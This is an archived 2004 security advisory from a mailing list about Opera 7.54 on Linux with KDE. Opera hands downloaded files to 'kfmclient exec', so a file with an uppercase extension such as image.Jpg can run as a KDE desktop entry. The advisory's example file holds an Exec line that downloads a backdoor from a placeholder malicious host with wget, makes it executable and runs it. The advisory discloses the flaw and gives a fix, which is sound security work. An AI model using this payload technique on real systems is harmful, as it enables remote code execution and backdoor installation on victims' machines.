lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <BAY23-F358782E7529D627E58ACB6C8AB0@phx.gbl>
From: badpenguin79 at hotmail.com (Giovanni Delvecchio)
Subject: [ZH2004-19SA]Possible execution of remote shell
	commands in Opera with kfmclient

Author: Giovanni Delvecchio
e-mail: badpenguin@...e-h.org

Tested version:
Opera 7.54 linux version with Kde 3.2.3

Original advisory: http://zone-h.org/en/advisories/read/id=6503/


Problem:
=======
Opera for linux uses "kfmclient exec" as "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop 
Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:

________________________________

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________


Possible method of Exploitation
=========================

This method of exploitation needs that a particular file name extension
is used.
If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , 
the command in "Exec=" entry will be executed.
Instead, If "page.htm" is used as file name, it will not be opened like a 
"kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since
the "system" is case sensitive.

Attack scenario:

1- A user clicks on a link which requires http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field , for
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will 
show a dialog window.

3- if a user chooses "Open" to view image.Jpg, it will be opened by
"kfmclient exec" command, since kfmclient is the "Default Application"

4- Image.Jpg is a kde desktop entry :

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c 
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

Note: \t is an horizontal tab.
In this case a backdoor will be downloaded on victim's computer and 
executed.


Solution:
========
Disable "kfmclient exec" as default application

_________________________________________________________________
Ricerche online pi? semplici e veloci con MSN Toolbar! 
http://toolbar.msn.it/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ